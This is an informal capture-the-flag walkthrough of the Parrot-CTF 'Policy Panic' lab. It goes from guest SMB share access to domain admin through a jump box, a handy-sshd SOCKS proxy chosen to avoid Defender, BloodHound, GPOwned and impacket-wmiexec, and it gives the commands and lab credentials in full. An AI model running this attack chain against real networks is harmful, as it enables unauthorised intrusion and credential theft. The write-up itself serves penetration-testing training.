Policy Panic Parrot CTF Write-up
Hello guys and welcome back to another walkthough this time we are going to be tackling Policy panic from Parrot-CTF. The challenge consist of two machine one a jump box and the second one active directory server. You find some valid credentials on a share and the credentials works on RDP. On landing on the jump server you discover that the box has defender enabled meaning using the jump box to enumerate the AD server becomes a bit hard. We manage to create a dynamic proxy using a tool called handy-sshd a really amazing tool in my opinion because you run a single binary and it starts a full SSH session in both Linux and windows and using the spawn SSH session a stable Dynamic proxy which allows us to connect to the Active directory server from our machine. The reason as to why i didn’t use chisel (which is widely known) is because it immediately gets flagged by defender and i didn’t want to go down the route of AMSI-Bypass and defender evasion. After we enumerate the Active directory server we discover that there’s a vulnerable group policy which has a startup batch script that contains a password for one of the Domain administrator’s . Using the domain admins credentials we get domain admin access to the Active directory server. Without much say let’s jump in
As always we start off by running an nmap scan on the IP Address provided which on our case is 10.14.0.214. The command we use was
/usr/lib/nmap/nmap --privileged -sC -sV -oA nmap/policy 10.14.0.214Looking at the results we see that 4 ports are open in the top 1000 ports
But the results also looks a bit interesting because the description of challenge clearly states that we are dealing with an active directory server meaning port like 88 kerberos and 389 LDAP should be open but we are not seeing them. This means that most likely we are dealing with a jump directory server in my opinion.
We cannot begin by enumerating Remote Desktop because we need valid credentials. My focus was on Microsoft windows remote RCP (Port 135 and 139) and SMB (Port 445). For MSRPC i used a tool called rpcclient and the command
rpcclient -N 10.14.0.214— N specifies null authentication since we don’t have a valid credential yet. but from the screenshot below you can see that we get an access denied
Next focus was enumerating Samba and the tool that i usually use it netexec
The command to check if i can access the shares is
netexec smb 10.14.0.214 -u "test" -p test --shares -M spider_pluThe command performs guest authentications and spiders any readable shares present. There are a few iterations which you should try because sometime this specific command fails. These commands are
netexec smb 10.14.0.214 -u "test" -p test --shares -M spider_plus
netexec smb 10.14.0.214 -u "test" -p "" --shares -M spider_plus
netexec smb 10.14.0.214 -u "" -p "" --shares -M spider_plus
netexec smb 10.14.0.214 -u "guest" -p "guest" --shares -M spider_plus
netexec smb 10.14.0.214 -u "guest" -p "" --shares -M spider_plusIf the server allows for guest authentication at-least one of the above commands should work
Looking at the output from netexec we have two non standard shares which are
- shareme
- users
Looking at the JSON file generated we get a user called user01 and a file called it-message.txt
With the username we can try to perform a brute force attack and see if we can get valid credentials but it’s always the last thing to do because the attack is so noisy and sometimes it never works. I read it-message.txt from impacket and the command
impacket-smbclient ./guest@10.14.0.214The password i left blank. Looking at the contents of it-message.txt we get the password for user01
Also, something i forgot to mention we can enumerate valid users on the jump server using an impackets tool called lookupsids and the command
impacket-lookupsid ./guest@10.14.0.214Looking at the output below we see that there is a user called win-1
Remember to leave the password as blank. Using the newly acquired username we can try and run a brute force attack on the jump server. But we already have a password for the user01.
Trying the credentials on Remote Desktop worked!!. We have a successful login
The remote desktop client am using is remmina. Now that we have managed to compromise the Jump server the easiest way to now if it’s connected to an active directory domain controller is by running the command
net user /domain
Using that command we get some useful details like the users who are i the active directory and the host-name corresponding the the Active directory server
Admin01
Administrator
Guest
krbtgt
mkid
User01Using the host-name we can try pinging the server and this will give us the IP Address of the server is 10.20.0.55. From here i wanted to perform lateral movement on the server and the best way to do this by using a Dynamic port forward. The tool of choice for most pen-testers is chisel which is a really amazing tool but the problem is of late it’s been getting flagged by defender and in this walk though i didn’t want trough defender evasion because it’s something am actively learning about but i found a tool that came in handy and it’s definitely going into my arsenal. The tool is called handy-sshd
I downloaded the binary to the server annd ran usig the command
.\handy-sshd.exe --user "john:mypass"
From my attacker’s box i ran the command
ssh john@10.14.0.214 -p 2222 -D 1080
In the proxychains4.conf file i added the following linne
Then tried to connect to the Active Directory server using the following command. Remember the connection must pass through proxychains
proxychains netexec smb 10.20.0.53 -u user01 -p 'Welcome123!'
Sweet now i considered on running bloodhound to just enumerate the Active Directory environment
The command i used was
proxychains python3 /home/musyoka/Desktop/git/BloodHound.py/bloodhound.py -u user01 -p 'Welcome123!' -d parrot-ctfs.com -ns 10.20.0.53 --dns-tcp -c All,LoggedOn
I imported the files to bloodhound for consumption. To download bloodhound you can use the following site and
For neo4j you can use the following site
https://neo4j.com/deployment-center/
To set up neo4j use the command
./neo4j console
For bloodhound use the following command
sudo ./BloodHound --no-sandbox
The boxes had already pointed out that we are supposed to abuse a Group policy object to and i looked for all group policy objects using the following bloodhound custom queries
Match (n:GPO) RETURN nA Full list can be found in the following link
Looking at the policies we get a vulnerable one
To enumerate more on the policy i used a tool called gpowned
Using the tool i listed all Group Policy object to get their name. The command i used was
proxychains python3 GPOwned.py -u user01 --p 'Welcome123!' -d 'parrot-ctfs.com' -dc-ip 10.20.0.53 -gpcmachine -listgpo
We can see that the vulnerable template has some scripts which is definitely interesting. Before doing anything i decided to do a backup of the group policy and the command i used was
proxychains python3 GPOwned.py -u user01 --p 'Welcome123!' -d 'parrot-ctfs.com' -dc-ip 10.20.0.53 -gpcmachine -backup test01 -name "{BE54F2C6-5140-4042-8849-D537054978D4}"
Something now definitely stands out. There is a script.bat from the backed up Group policy object
Using impacket’s smbclient i read the file and got the credentials for admin01
With the admin credentials we can get a domain admin’s shell by using impacket’s wmiexec. The command i used was
proxychains impacket-wmiexec parrot-ctfs.com/admin01@10.20.0.53
We have access to the domain controller
What we are just remaining with getting the root flag. Funny enough the flag was not in the domain controller but the administrator’s folder of the jump server
And with that we’re pretty much done. If this was a real engagement we could have used the admin credentials to now audit the active directory server. Like dump hashes, pass them around, check for password policies etc
But that’s it for today if you liked the walk though clap for me down below and follow me so that you won’t miss any upcoming walk though.